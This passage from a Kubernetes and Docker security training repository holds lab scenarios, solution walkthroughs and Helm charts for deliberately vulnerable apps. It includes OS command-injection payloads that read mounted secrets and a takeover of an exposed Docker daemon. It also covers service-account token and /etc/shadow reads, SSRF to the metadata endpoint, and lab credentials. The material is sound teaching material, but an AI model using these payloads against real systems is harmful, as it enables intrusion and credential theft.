`http://CTFVMIP:8080/?domain=;ls -l /run/` 15 | 16 | ![docker swarm app search locations](images/docker-swarm-search-locations.png) 17 | 18 | * The secrets are mounted via `docker secrets` at `/var/run/` or `/run/`. 
We can access them by visiting `http://CTFVMIP:8080/?domain=;cat /run/secrets/data_api_key` 19 | 20 | ![docker secret access data](images/docker-secrets-default-location.png) 21 | 22 | * A similar approach can be user for `docker swarm` and `kubernetes` cluster environements 23 | -------------------------------------------------------------------------------- /gitbook/scenario-4/scenario.md: -------------------------------------------------------------------------------- 1 | # Docker escape using Pod Volume Mounts to access the nodes and host systems - Scenario 2 | 3 | Bob's company has a lot of helpful applications for their IT admins. The same developers who built the Server Health Check application, also built a "Connectivity check" application. Well, they obviously re-used the code (who doesn't!) leading to an interesting vulnerability. 4 | 5 | Instead of making a web request now, this application makes ping requests to a server that Bob specifies. And we all know the quickest way to make a ping request is to execute the `ping` command. 6 | 7 | Web applications that execute OS commands using user input can fall prey to OS command injection vulnerabilities which would allow an attacker (our dear Bob in this case) to execute any accesible OS command through the user input fields. Oh and it's even more exciting if this application is running on docker! 8 | 9 | Let's hack this box and see where we can go from here :) 10 | 11 | ## Tips 12 | 13 | * Endpoint for your attack is `http://connectivity-check.student-uniquename.cloudsec.training`. Replace `uniquename` with your unique name 14 | * Login to the application using `username: sysadmin` and `password: superpowers` -------------------------------------------------------------------------------- /gitbook/sysdig-faclo/README.md: -------------------------------------------------------------------------------- 1 | # Sysdig Falco 2 | 3 | Sysdig Falco is an open source container runtime security. 
It is a behavioral monitoring software designed to detect anomalous activity. Sysdig Falco works as a intrusion detection system on any Linux host, although it is particularly useful when using Docker since it supports container-specific context like `container.id`, `container.image` or `namespaces` for its rules. 4 | 5 | ## Sysdig Falco Logging for Containers 6 | 7 | * Run the following command in student VM 8 | 9 | ```bash 10 | sudo falco 11 | ``` 12 | ![start sysdig falco](images/sysdig-falco-start.png) 13 | 14 | * Then start another container and perform operations like executing shell, reading shadow file, etc. 15 | 16 | ```bash 17 | docker exec -it registry sh 18 | cat /etc/passwd 19 | cat /etc/shadow 20 | ``` 21 | ![Running the container and commands](images/container-and-commands.png) 22 | 23 | ## Falco attack detection based on ruleset 24 | 25 | ![faclo detection](images/falco-detection.png) 26 | 27 | ## Play with Sysdig Falco Scenario 28 | 29 | ![Sysdig Faclo Scenario](images/sysdig-falco-scenario.png) 30 | 31 | [Sysdig Falco: Container security monitoring](https://www.katacoda.com/mateobur/scenarios/falco) -------------------------------------------------------------------------------- /gitbook/apparmor-nginx-profile/README.md: -------------------------------------------------------------------------------- 1 | # LSM - Apparmor Nginx Profile 2 | 3 | The Linux Security Module (LSM) framework provides a mechanism for various security checks to be hooked by new kernel extensions. 4 | 5 | The primary users of the LSM interface are Mandatory Access Control (MAC) extensions which provide a comprehensive security policy. Examples include SELinux, Smack, Tomoyo, and AppArmor. 
6 | 7 | ## Demonstration 8 | 9 | * Let's run a simple nginx container 10 | 11 | ```bash 12 | docker run --rm -it --name lsm-before -p 4321:80 nginx bash 13 | 14 | sh 15 | dash 16 | bash 17 | ``` 18 | 19 | ![lsm before nginx](images/lsm-before.png) 20 | 21 | 22 | * Now lets apply the apparmor profile for the container and see if we can perform other operations like `sh` and `dash` 23 | 24 | ```bash 25 | cd /opt/docker-nginx 26 | 27 | sudo bane sample.toml 28 | 29 | docker run --rm -it --name lsm-after \ 30 | --security-opt="apparmor:docker-nginx-sample" -p 4320:80 nginx bash 31 | 32 | sh 33 | dash 34 | bash 35 | ``` 36 | 37 | ![lsm after nginx](images/lsm-after.png) 38 | 39 | 40 | * Have a look at `cat /opt/docker-nginx/docker-nignx-sample` file for the apparmor profile that was created using [bane](https://github.com/genuinetools/bane) -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/server-health/templates/_helpers.tpl: -------------------------------------------------------------------------------- 1 | {{/* vim: set filetype=mustache: */}} 2 | {{/* 3 | Expand the name of the chart. 4 | */}} 5 | {{- define "server-health.name" -}} 6 | {{- default .Chart.Name .Values.nameOverride | trunc 63 | trimSuffix "-" -}} 7 | {{- end -}} 8 | 9 | {{/* 10 | Create a default fully qualified app name. 11 | We truncate at 63 chars because some Kubernetes name fields are limited to this (by the DNS naming spec). 12 | If release name contains chart name it will be used as a full name. 
13 | */}} 14 | {{- define "server-health.fullname" -}} 15 | {{- if .Values.fullnameOverride -}} 16 | {{- .Values.fullnameOverride | trunc 63 | trimSuffix "-" -}} 17 | {{- else -}} 18 | {{- $name := default .Chart.Name .Values.nameOverride -}} 19 | {{- if contains $name .Release.Name -}} 20 | {{- .Release.Name | trunc 63 | trimSuffix "-" -}} 21 | {{- else -}} 22 | {{- printf "%s-%s" .Release.Name $name | trunc 63 | trimSuffix "-" -}} 23 | {{- end -}} 24 | {{- end -}} 25 | {{- end -}} 26 | 27 | {{/* 28 | Create chart name and version as used by the chart label. 29 | */}} 30 | {{- define "server-health.chart" -}} 31 | {{- printf "%s-%s" .Chart.Name .Chart.Version | replace "+" "_" | trunc 63 | trimSuffix "-" -}} 32 | {{- end -}} 33 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/mailbox-service/templates/_helpers.tpl: -------------------------------------------------------------------------------- 1 | {{/* vim: set filetype=mustache: */}} 2 | {{/* 3 | Expand the name of the chart. 4 | */}} 5 | {{- define "mailbox-service.name" -}} 6 | {{- default .Chart.Name .Values.nameOverride | trunc 63 | trimSuffix "-" -}} 7 | {{- end -}} 8 | 9 | {{/* 10 | Create a default fully qualified app name. 11 | We truncate at 63 chars because some Kubernetes name fields are limited to this (by the DNS naming spec). 12 | If release name contains chart name it will be used as a full name. 
13 | */}} 14 | {{- define "mailbox-service.fullname" -}} 15 | {{- if .Values.fullnameOverride -}} 16 | {{- .Values.fullnameOverride | trunc 63 | trimSuffix "-" -}} 17 | {{- else -}} 18 | {{- $name := default .Chart.Name .Values.nameOverride -}} 19 | {{- if contains $name .Release.Name -}} 20 | {{- .Release.Name | trunc 63 | trimSuffix "-" -}} 21 | {{- else -}} 22 | {{- printf "%s-%s" .Release.Name $name | trunc 63 | trimSuffix "-" -}} 23 | {{- end -}} 24 | {{- end -}} 25 | {{- end -}} 26 | 27 | {{/* 28 | Create chart name and version as used by the chart label. 29 | */}} 30 | {{- define "mailbox-service.chart" -}} 31 | {{- printf "%s-%s" .Chart.Name .Chart.Version | replace "+" "_" | trunc 63 | trimSuffix "-" -}} 32 | {{- end -}} 33 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/connectivity-check/templates/_helpers.tpl: -------------------------------------------------------------------------------- 1 | {{/* vim: set filetype=mustache: */}} 2 | {{/* 3 | Expand the name of the chart. 4 | */}} 5 | {{- define "connectivity-check.name" -}} 6 | {{- default .Chart.Name .Values.nameOverride | trunc 63 | trimSuffix "-" -}} 7 | {{- end -}} 8 | 9 | {{/* 10 | Create a default fully qualified app name. 11 | We truncate at 63 chars because some Kubernetes name fields are limited to this (by the DNS naming spec). 12 | If release name contains chart name it will be used as a full name. 
13 | */}} 14 | {{- define "connectivity-check.fullname" -}} 15 | {{- if .Values.fullnameOverride -}} 16 | {{- .Values.fullnameOverride | trunc 63 | trimSuffix "-" -}} 17 | {{- else -}} 18 | {{- $name := default .Chart.Name .Values.nameOverride -}} 19 | {{- if contains $name .Release.Name -}} 20 | {{- .Release.Name | trunc 63 | trimSuffix "-" -}} 21 | {{- else -}} 22 | {{- printf "%s-%s" .Release.Name $name | trunc 63 | trimSuffix "-" -}} 23 | {{- end -}} 24 | {{- end -}} 25 | {{- end -}} 26 | 27 | {{/* 28 | Create chart name and version as used by the chart label. 29 | */}} 30 | {{- define "connectivity-check.chart" -}} 31 | {{- printf "%s-%s" .Chart.Name .Chart.Version | replace "+" "_" | trunc 63 | trimSuffix "-" -}} 32 | {{- end -}} 33 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/server-health/templates/ingress.yaml: -------------------------------------------------------------------------------- 1 | {{- if .Values.ingress.enabled -}} 2 | {{- $fullName := include "server-health.fullname" . -}} 3 | {{- $ingressPaths := .Values.ingress.paths -}} 4 | apiVersion: extensions/v1beta1 5 | kind: Ingress 6 | metadata: 7 | name: {{ $fullName }} 8 | labels: 9 | app.kubernetes.io/name: {{ include "server-health.name" . }} 10 | helm.sh/chart: {{ include "server-health.chart" . }} 11 | app.kubernetes.io/instance: {{ .Release.Name }} 12 | app.kubernetes.io/managed-by: {{ .Release.Service }} 13 | {{- with .Values.ingress.annotations }} 14 | annotations: 15 | {{- toYaml . | nindent 4 }} 16 | {{- end }} 17 | spec: 18 | {{- if .Values.ingress.tls }} 19 | tls: 20 | {{- range .Values.ingress.tls }} 21 | - hosts: 22 | {{- range .hosts }} 23 | - {{ . | quote }} 24 | {{- end }} 25 | secretName: {{ .secretName }} 26 | {{- end }} 27 | {{- end }} 28 | rules: 29 | {{- range .Values.ingress.hosts }} 30 | - host: {{ . | quote }} 31 | http: 32 | paths: 33 | {{- range $ingressPaths }} 34 | - path: {{ . 
}} 35 | backend: 36 | serviceName: {{ $fullName }} 37 | servicePort: http 38 | {{- end }} 39 | {{- end }} 40 | {{- end }} 41 | -------------------------------------------------------------------------------- /gitbook/kube-hunter/readme.md: -------------------------------------------------------------------------------- 1 | # Running kube-hunter 2 | 3 | Kube-hunter hunts for security weaknesses in Kubernetes clusters. The tool was developed to increase awareness and visibility for security issues in Kubernetes environments. **You should NOT run kube-hunter on a Kubernetes cluster you don't own!** 4 | 5 | ## How to run kube-hunter 6 | 7 | * IP addresses can be obtained by running the following command 8 | 9 | ```bash 10 | kubectl cluster-info 11 | kubectl get nodes -o wide 12 | ``` 13 | 14 | ![](images/get-ip-info.png) 15 | 16 | 17 | * Let's run kube-hunter from outside the cluster as a black box. Select the option `1` to perform "Remote Scanning". 18 | 19 | ```bash 20 | cd /data/kube-hunter 21 | ./kube-hunter.py 22 | ``` 23 | 24 | ![](images/kube-hunter-external.png) 25 | 26 | * We can also run the kube-hunter as a active scan within the cluster as well 27 | 28 | ```bash 29 | cd /data/kube-hunter 30 | kubectl apply -f job.yaml 31 | ``` 32 | 33 | * Get the results by looking at stdout logs of the pod 34 | 35 | ```bash 36 | kubectl get pods --selector job-name=kube-hunter 37 | kubectl logs 38 | ``` 39 | 40 | ![](images/kube-hunter-results.png) 41 | 42 | 43 | ### References 44 | 45 | * [https://github.com/aquasecurity/kube-hunter](https://github.com/aquasecurity/kube-hunter) -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/mailbox-service/templates/ingress.yaml: -------------------------------------------------------------------------------- 1 | {{- if .Values.ingress.enabled -}} 2 | {{- $fullName := include "mailbox-service.fullname" . 
-}} 3 | {{- $ingressPaths := .Values.ingress.paths -}} 4 | apiVersion: extensions/v1beta1 5 | kind: Ingress 6 | metadata: 7 | name: {{ $fullName }} 8 | labels: 9 | app.kubernetes.io/name: {{ include "mailbox-service.name" . }} 10 | helm.sh/chart: {{ include "mailbox-service.chart" . }} 11 | app.kubernetes.io/instance: {{ .Release.Name }} 12 | app.kubernetes.io/managed-by: {{ .Release.Service }} 13 | {{- with .Values.ingress.annotations }} 14 | annotations: 15 | {{- toYaml . | nindent 4 }} 16 | {{- end }} 17 | spec: 18 | {{- if .Values.ingress.tls }} 19 | tls: 20 | {{- range .Values.ingress.tls }} 21 | - hosts: 22 | {{- range .hosts }} 23 | - {{ . | quote }} 24 | {{- end }} 25 | secretName: {{ .secretName }} 26 | {{- end }} 27 | {{- end }} 28 | rules: 29 | {{- range .Values.ingress.hosts }} 30 | - host: {{ . | quote }} 31 | http: 32 | paths: 33 | {{- range $ingressPaths }} 34 | - path: {{ . }} 35 | backend: 36 | serviceName: {{ $fullName }} 37 | servicePort: http 38 | {{- end }} 39 | {{- end }} 40 | {{- end }} 41 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/connectivity-check/templates/ingress.yaml: -------------------------------------------------------------------------------- 1 | {{- if .Values.ingress.enabled -}} 2 | {{- $fullName := include "connectivity-check.fullname" . -}} 3 | {{- $ingressPaths := .Values.ingress.paths -}} 4 | apiVersion: extensions/v1beta1 5 | kind: Ingress 6 | metadata: 7 | name: {{ $fullName }} 8 | labels: 9 | app.kubernetes.io/name: {{ include "connectivity-check.name" . }} 10 | helm.sh/chart: {{ include "connectivity-check.chart" . }} 11 | app.kubernetes.io/instance: {{ .Release.Name }} 12 | app.kubernetes.io/managed-by: {{ .Release.Service }} 13 | {{- with .Values.ingress.annotations }} 14 | annotations: 15 | {{- toYaml . 
| nindent 4 }} 16 | {{- end }} 17 | spec: 18 | {{- if .Values.ingress.tls }} 19 | tls: 20 | {{- range .Values.ingress.tls }} 21 | - hosts: 22 | {{- range .hosts }} 23 | - {{ . | quote }} 24 | {{- end }} 25 | secretName: {{ .secretName }} 26 | {{- end }} 27 | {{- end }} 28 | rules: 29 | {{- range .Values.ingress.hosts }} 30 | - host: {{ . | quote }} 31 | http: 32 | paths: 33 | {{- range $ingressPaths }} 34 | - path: {{ . }} 35 | backend: 36 | serviceName: {{ $fullName }} 37 | servicePort: http 38 | {{- end }} 39 | {{- end }} 40 | {{- end }} 41 | -------------------------------------------------------------------------------- /gitbook/kube-bench/readme.md: -------------------------------------------------------------------------------- 1 | # Running kube-bench 2 | 3 | kube-bench is a Go application that checks whether Kubernetes is deployed securely by running the checks documented in the [CIS Kubernetes Benchmark](https://www.cisecurity.org/benchmark/kubernetes/). 4 | 5 | 1. Master Node Security Configuration 6 | * API Server 7 | * Scheduler 8 | * Controller Manager 9 | * Configuration Files 10 | * etcd 11 | * General Security Primitives 12 | * PodSecurityPolicices 13 | 2. Workere Node Security Configuration 14 | * Kubelet 15 | * Configuration Files 16 | 17 | ## How to run kube-bench 18 | 19 | * We can run kube-bench by navigating to the `cd /data/kube-bench` 20 | 21 | ```bash 22 | kubectl apply -f kube-bench-node.yaml 23 | ``` 24 | 25 | * Check the job status and get the pod name 26 | 27 | ```bash 28 | kubectl get pods --selector job-name=kube-bench-node 29 | ``` 30 | 31 | ![](images/get-kube-bench-pod.png) 32 | 33 | * See the kube-bench node scan results by checking the stdout logs 34 | 35 | ```bash 36 | kubectl logs 37 | ``` 38 | 39 | ![](images/kube-bench-results.png) 40 | 41 | 42 | > Note: Here we are running only for the Kubernetes nodes as this cluster is managed by GCP. 
We can also run master checks by referring to https://github.com/aquasecurity/kube-bench -------------------------------------------------------------------------------- /gitbook/scenario-2/scenario.md: -------------------------------------------------------------------------------- 1 | # Attacking Kubernetes Cluster Metadata using SSRF vulnerability - Scenario 2 | 3 | Applications hosted on the cloud can lead to a whole slew of other problems. Especially, vulnerable ones :) 4 | 5 | Bob's company has an application deployed on GCP that allows you to quickly check the health of other web applications on the Internet. The application uses a server side function to connect to the specified URL and let's Bob know if the web app is functioning as expected or not. 6 | 7 | Well, the most common problem applications like this face is not sanitizing user input which allows Bob to specify any endpoint (and of course any port) to make the server perform a GET request. 8 | 9 | This is bad, yes, but it can be worse for applications on the cloud as you can query the helpful metadata endpoints. That is whole playground for you to explore. Let's see what we can do with this scenario! 10 | 11 | ## Tips 12 | 13 | * Endpoint for your attack is `http://server-health.student-uniquename.cloudsec.training`. Replace `uniquename` with your unique name 14 | * The login credentials for the application are `username: serveradmin` and `password: monitorworld` 15 | * Useful reference: [Google Instance Metadata](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata) `169.254.169.254` -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/server-health/values.yaml: -------------------------------------------------------------------------------- 1 | # Default values for server-health. 2 | # This is a YAML-formatted file. 3 | # Declare variables to be passed into your templates. 
4 | 5 | replicaCount: 1 6 | 7 | image: 8 | repository: appsecco/k8s-training-server-health 9 | tag: latest 10 | pullPolicy: Always 11 | 12 | nameOverride: "" 13 | fullnameOverride: "" 14 | 15 | service: 16 | type: ClusterIP 17 | port: 80 18 | 19 | ingress: 20 | enabled: false 21 | annotations: {} 22 | # kubernetes.io/ingress.class: nginx 23 | # kubernetes.io/tls-acme: "true" 24 | paths: [] 25 | hosts: 26 | - chart-example.local 27 | tls: [] 28 | # - secretName: chart-example-tls 29 | # hosts: 30 | # - chart-example.local 31 | 32 | resources: 33 | # We usually recommend not to specify default resources and to leave this as a conscious 34 | # choice for the user. This also increases chances charts run on environments with little 35 | # resources, such as Minikube. If you do want to specify resources, uncomment the following 36 | # lines, adjust them as necessary, and remove the curly braces after 'resources:'. 37 | limits: 38 | cpu: 30m 39 | memory: 50Mi 40 | requests: 41 | cpu: 20m 42 | memory: 40Mi 43 | 44 | nodeSelector: {} 45 | 46 | tolerations: [] 47 | 48 | affinity: {} 49 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/mailbox-service/values.yaml: -------------------------------------------------------------------------------- 1 | # Default values for mailbox-service. 2 | # This is a YAML-formatted file. 3 | # Declare variables to be passed into your templates. 
4 | 5 | replicaCount: 1 6 | 7 | image: 8 | repository: appsecco/k8s-training-mailbox-service 9 | tag: latest 10 | pullPolicy: Always 11 | 12 | nameOverride: "" 13 | fullnameOverride: "" 14 | 15 | service: 16 | type: ClusterIP 17 | port: 80 18 | 19 | ingress: 20 | enabled: false 21 | annotations: {} 22 | # kubernetes.io/ingress.class: nginx 23 | # kubernetes.io/tls-acme: "true" 24 | paths: [] 25 | hosts: 26 | - chart-example.local 27 | tls: [] 28 | # - secretName: chart-example-tls 29 | # hosts: 30 | # - chart-example.local 31 | 32 | resources: 33 | # We usually recommend not to specify default resources and to leave this as a conscious 34 | # choice for the user. This also increases chances charts run on environments with little 35 | # resources, such as Minikube. If you do want to specify resources, uncomment the following 36 | # lines, adjust them as necessary, and remove the curly braces after 'resources:'. 37 | limits: 38 | cpu: 30m 39 | memory: 50Mi 40 | requests: 41 | cpu: 20m 42 | memory: 40Mi 43 | 44 | nodeSelector: {} 45 | 46 | tolerations: [] 47 | 48 | affinity: {} 49 | -------------------------------------------------------------------------------- /infra-setup/Helm-Charts/connectivity-check/values.yaml: -------------------------------------------------------------------------------- 1 | # Default values for connectivity-check. 2 | # This is a YAML-formatted file. 3 | # Declare variables to be passed into your templates. 
4 | 5 | replicaCount: 1 6 | 7 | image: 8 | repository: appsecco/k8s-training-connectivity-check 9 | tag: latest 10 | pullPolicy: Always 11 | 12 | nameOverride: "" 13 | fullnameOverride: "" 14 | 15 | service: 16 | type: ClusterIP 17 | port: 80 18 | 19 | ingress: 20 | enabled: false 21 | annotations: {} 22 | # kubernetes.io/ingress.class: nginx 23 | # kubernetes.io/tls-acme: "true" 24 | paths: [] 25 | hosts: 26 | - chart-example.local 27 | tls: [] 28 | # - secretName: chart-example-tls 29 | # hosts: 30 | # - chart-example.local 31 | 32 | resources: 33 | # We usually recommend not to specify default resources and to leave this as a conscious 34 | # choice for the user. This also increases chances charts run on environments with little 35 | # resources, such as Minikube. If you do want to specify resources, uncomment the following 36 | # lines, adjust them as necessary, and remove the curly braces after 'resources:'. 37 | limits: 38 | cpu: 50m 39 | memory: 100Mi 40 | requests: 41 | cpu: 40m 42 | memory: 80Mi 43 | 44 | nodeSelector: {} 45 | 46 | tolerations: [] 47 | 48 | affinity: {} 49 | -------------------------------------------------------------------------------- /infra-setup/code-base/code-base.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Secret 3 | metadata: 4 | name: codebasekey 5 | type: Opaque 6 | data: 7 | codebaseapiloginpass: U3VwZXJTdHJvbmdQYXNzd29yZEAzMjEhCg== 8 | codebaseapikey: ZmxhZzpiMjdlZTM4MWZkOWRhNDlhNDM1ZGNkYjQzMzkwYTI4Ngo= 9 | --- 10 | apiVersion: apps/v1 11 | kind: Deployment 12 | metadata: 13 | name: code-base-deployment 14 | labels: 15 | app: code-base 16 | spec: 17 | selector: 18 | matchLabels: 19 | app: code-base 20 | template: 21 | metadata: 22 | labels: 23 | app: code-base 24 | spec: 25 | containers: 26 | - name: code-base 27 | image: appsecco/k8s-training-code-base 28 | resources: 29 | limits: 30 | cpu: 20m 31 | memory: 30Mi 32 | requests: 33 | cpu: 10m 34 | memory: 
20Mi 35 | command: ["/bin/sh"] 36 | args: 37 | - "-c" 38 | - > 39 | tail -f /dev/null 40 | env: 41 | - name: CODEBASE_API_LOGIN_PASS 42 | valueFrom: 43 | secretKeyRef: 44 | name: codebasekey 45 | key: codebaseapiloginpass 46 | - name: CODEBASE_API_KEY 47 | valueFrom: 48 | secretKeyRef: 49 | name: codebasekey 50 | key: codebaseapikey 51 | -------------------------------------------------------------------------------- /gitbook/attacking-docker-misconfiguration/solution.md: -------------------------------------------------------------------------------- 1 | # Exploiting docker misconfiguration - Solution 2 | 3 | > The Docker daemon can listen for Docker Engine API requests via three different types of Socket `unix`, `tcp`, and `fd`. To access remotely we have to enable `tcp` socket. The default setup provides un-encrypted and un-authenticated direct access to the Docker daemon. It is conventional to use port `2375` for un-encrypted, and port `2376` for encrypted communication with the daemon. 4 | 5 | * Scan the `2375` and `2376` port using nmap from student VM 6 | 7 | ```bash 8 | nmap -p 2375,2376 -n 192.168.56.4 -v 9 | ``` 10 | 11 | ![nmap scan for port 2375](images/misconfig-nmap-scan.png) 12 | 13 | 14 | * We can query the docker API using `curl` 15 | 16 | ```bash 17 | curl 192.168.56.4:2375/images/json | jq . 18 | ``` 19 | 20 | ![accessing images via curl](images/misconfig-curl-images.png) 21 | 22 | * Attacker can abuse this by using the docker daemon configuration to access the host system's docker runtime 23 | 24 | ```bash 25 | docker -H tcp://CTFVMIP:2375 ps 26 | docker -H tcp://CTFVMIP:2375 images 27 | ``` 28 | 29 | ![docker tcp host usage](images/docker-tcp-host-access.png) 30 | 31 | * Now, we have full privilege over the host system :) 32 | 33 | ## Fixing this vulnerability 34 | 35 | * Use the `2376` port for exposing if required to expose the Docker API. 
Otherwise keep the daemon on its local `unix` socket (or systemd socket activation via `fd`) and do not bind it to a TCP port at all; access to that socket is equivalent to root on the host, so restrict it to trusted users.
12 | 13 | 14 | * Read more about [A Study of Security Vulnerabilities on Docker Hub](http://dance.csc.ncsu.edu/papers/codaspy17.pdf) 15 | 16 | * [Research Paper](https://dl.acm.org/citation.cfm?id=3029832) -------------------------------------------------------------------------------- /gitbook/attacking-docker-containers/misconfiguration.md: -------------------------------------------------------------------------------- 1 | # Exploiting docker misconfiguration 2 | 3 | In this scenario we will see that misconfigured `docker` with port 2375 running and exposed. We will use this with docker runtime host option to access the contianers, images and gain host system privileges. 4 | 5 | > The Docker daemon can listen for Docker Engine API requests via three different types of Socket `unix`, `tcp`, and `fd`. To access remotely we have to enable `tcp` socket. The default setup provides un-encrypted and un-authenticated direct access to the Docker daemon. It is conventional to use port `2375` for un-encrypted, and port `2376` for encrypted communication with the daemon. 6 | 7 | * Scan the `2375` and `2376` port using nmap from student VM 8 | 9 | ```bash 10 | nmap -p 2375,2376 -n 192.168.56.4 -v 11 | ``` 12 | 13 | ![nmap scan for port 2375](images/misconfig-nmap-scan.png) 14 | 15 | 16 | * We can query the docker API using `curl` 17 | 18 | ```bash 19 | curl 192.168.56.4:2375/images/json | jq . 
20 | ``` 21 | 22 | ![accessing images via curl](images/misconfig-curl-images.png) 23 | 24 | * Attacker can abuse this by using the docker daemon configuration to access the host system's docker runtime 25 | 26 | ```bash 27 | docker -H tcp://CTFVMIP:2375 ps 28 | docker -H tcp://CTFVMIP:2375 images 29 | ``` 30 | 31 | ![docker tcp host usage](images/docker-tcp-host-access.png) 32 | 33 | * Now, we have full privilege over the host system :) 34 | -------------------------------------------------------------------------------- /gitbook/deploy-app/using-helm.md: -------------------------------------------------------------------------------- 1 | # Deploying simple application in Kubernetes Cluster using Helm Chart 2 | 3 | * Deploying an app using basic helm chart, navigate to `sample-nginx` helm chart folder 4 | 5 | ```bash 6 | cd /data/sample-nginx 7 | ``` 8 | 9 | * Deploy the helm chart by running the following command 10 | 11 | ```bash 12 | helm install --name sample-nginx . 13 | ``` 14 | 15 | ![](images/helm-deploy.png) 16 | 17 | * Access the app using output template 18 | 19 | ```bash 20 | export POD_NAME=$(kubectl get pods --namespace default -l "app.kubernetes.io/name=sample-nginx,app.kubernetes.io/instance=sample-nginx" -o jsonpath="{.items[0].metadata.name}") 21 | kubectl port-forward $POD_NAME 8080:80 22 | ``` 23 | 24 | * Visit http://127.0.0.1:8080 to use your application 25 | 26 | ![](images/helm-deploy-access.png) 27 | 28 | * Change the `values.yaml` in the sample-nginx helm chart. Replace `tag: alpine` with `tag: latest` 29 | 30 | ```bash 31 | ... 32 | tag: alpine 33 | ... 34 | 35 | to 36 | 37 | ... 38 | tag: latest 39 | ... 40 | ``` 41 | 42 | * Upgrade the helm chart with new release 43 | 44 | ```bash 45 | helm upgrade sample-nginx . 
46 | ``` 47 | 48 | * Check the helm chart details and revisions 49 | 50 | ```bash 51 | helm ls sample-nginx 52 | ``` 53 | ![](images/helm-ls.png) 54 | 55 | * Deleting the helm chart 56 | 57 | ```bash 58 | helm delete --purge sample-nginx 59 | ``` 60 | 61 | ### References 62 | 63 | * [https://docs.helm.sh/](https://docs.helm.sh/) -------------------------------------------------------------------------------- /gitbook/extra/play-with-kubernetes.md: -------------------------------------------------------------------------------- 1 | # Play with Kubernetes 2 | 3 | Play with Kubernetes is a labs site provided by Docker and created by Tutorius. Play with Kubernetes is a playground which allows users to run K8s clusters in a matter of seconds. It gives the experience of having a free Alpine Linux Virtual Machine in browser. Under the hood Docker-in-Docker (DinD) is used to give the effect of multiple VMs/PCs. 4 | 5 | If you want to learn more about Kubernetes, consider the Play with Kubernetes Classroom which provides more directed learning using an integrated Play with Kubernetes commandline. 6 | 7 | [https://labs.play-with-k8s.com](https://labs.play-with-k8s.com/) 8 | 9 | ## Kubernetes for Beginners 10 | 11 | In this hands-on workshop, you will learn the basic concepts of Kubernetes. You will do that through interacting with Kubernetes through the command line terminals on the right. Ultimately you will deploy the sample application `Dockercoins` on both worker nodes. 12 | 13 | [https://training.play-with-kubernetes.com/kubernetes-workshop/](https://training.play-with-kubernetes.com/kubernetes-workshop/) 14 | 15 | ## Katacoda 16 | 17 | This is a Kubernetes playground. From here you can play with a Kubernetes host and explore it's API. 
18 | 19 | > Playgrounds give you a configured environment to start playing and exploring using an unstructured learning approach 20 | 21 | [https://www.katacoda.com/courses/kubernetes/playground](https://www.katacoda.com/courses/kubernetes/playground) -------------------------------------------------------------------------------- /gitbook/advanced-concepts/docker-swarm.md: -------------------------------------------------------------------------------- 1 | # Docker Swarm 2 | 3 | A swarm is a group of machines that are running Docker and joined into a cluster. After that has happened, you continue to run the Docker commands you're used to, but now they are executed on a cluster by a swarm manager. The machines in a swarm can be physical or virtual. 4 | 5 | 6 | * Let's setup docker swarm cluster 7 | 8 | ```bash 9 | docker swarm init 10 | ``` 11 | 12 | * Check the list of nodes 13 | 14 | ```bash 15 | docker node ls 16 | ``` 17 | 18 | ![list docker nodes](images/docker-node.png) 19 | 20 | * Starting new service in docker swarm cluster 21 | 22 | ```bash 23 | docker service create --replicas 1 --publish 5555:80 --name nginxservice nginx:alpine 24 | ``` 25 | 26 | ![creating service](images/docker-service-create.png) 27 | 28 | * Look at the running services 29 | 30 | ```bash 31 | docker service ls 32 | ``` 33 | 34 | * Inspecting the service 35 | 36 | ```bash 37 | docker service inspect --pretty nginxservice 38 | ``` 39 | 40 | * Accessing the service 41 | 42 | ```bash 43 | curl STUDENTIP:5555 44 | ``` 45 | 46 | ![accessing the service](images/docker-service-access.png) 47 | 48 | * Removing the service 49 | 50 | ```bash 51 | docker service rm nginxservice 52 | ``` 53 | 54 | * Leaving the swarm cluster 55 | 56 | ```bash 57 | docker swarm leave 58 | 59 | # If only one node in the cluster 60 | docker swarm leave --force 61 | ``` 62 | 63 | ## References 64 | 65 | * [Getting started with swarm](https://docs.docker.com/engine/swarm/swarm-tutorial/) 
-------------------------------------------------------------------------------- /gitbook/scenario-3/solution.md: -------------------------------------------------------------------------------- 1 | # Testing for the sensitive configurations and secrets in Kubernetes cluster - Solution 2 | 3 | ## Exec into Pod 4 | 5 | * Get pod details and login to the `code-base` pod using below command 6 | 7 | ```bash 8 | export CODEBASE_POD_NAME=$(kubectl get pods --selector app=code-base -o jsonpath="{.items[0].metadata.name}") 9 | kubectl exec -it $CODEBASE_POD_NAME sh 10 | ``` 11 | 12 | ![](images/exec-pod.png) 13 | 14 | ## Kubernetes Service Account 15 | 16 | * Now we can look for sensitive information by navigating the file system 17 | 18 | * Look in the default kubernetes locations 19 | 20 | ```bash 21 | ls -l /var/run/secrets/kubernetes.io/serviceaccount/ 22 | cat /var/run/secrets/kubernetes.io/serviceaccount/token 23 | ``` 24 | 25 | ![](images/default-svc.png) 26 | 27 | * Explore permissions available to service account using `kubectl auth can-i` 28 | 29 | `kubectl` can be downloaded inside the Pod from [Install Kubectl](https://kubernetes.io/docs/tasks/tools/install-kubectl/#install-kubectl-on-linux) 30 | 31 | ## Check Environment 32 | 33 | * Check for the environment variables 34 | 35 | ![](images/printenv.png) 36 | 37 | ## App Secrets 38 | 39 | * Find the app and the `.git` folder inside it which has old commits containing the sensitive information 40 | 41 | ```bash 42 | cd /app 43 | ls -la 44 | git log 45 | git checkout f17a07721ab9acec96aef0b1794ee466e516e37a 46 | ls -la 47 | cat .env 48 | ``` 49 | 50 | ![](images/git-app.png) 51 | ![](images/commit-log.png) 52 | ![](images/revert-and-secrets.png) 53 | -------------------------------------------------------------------------------- /gitbook/demos/cve-2019-9901.md: -------------------------------------------------------------------------------- 1 | # CVE-2019-9901 - Istio/Envoy Path traversal 2 | 3 | This scenario 
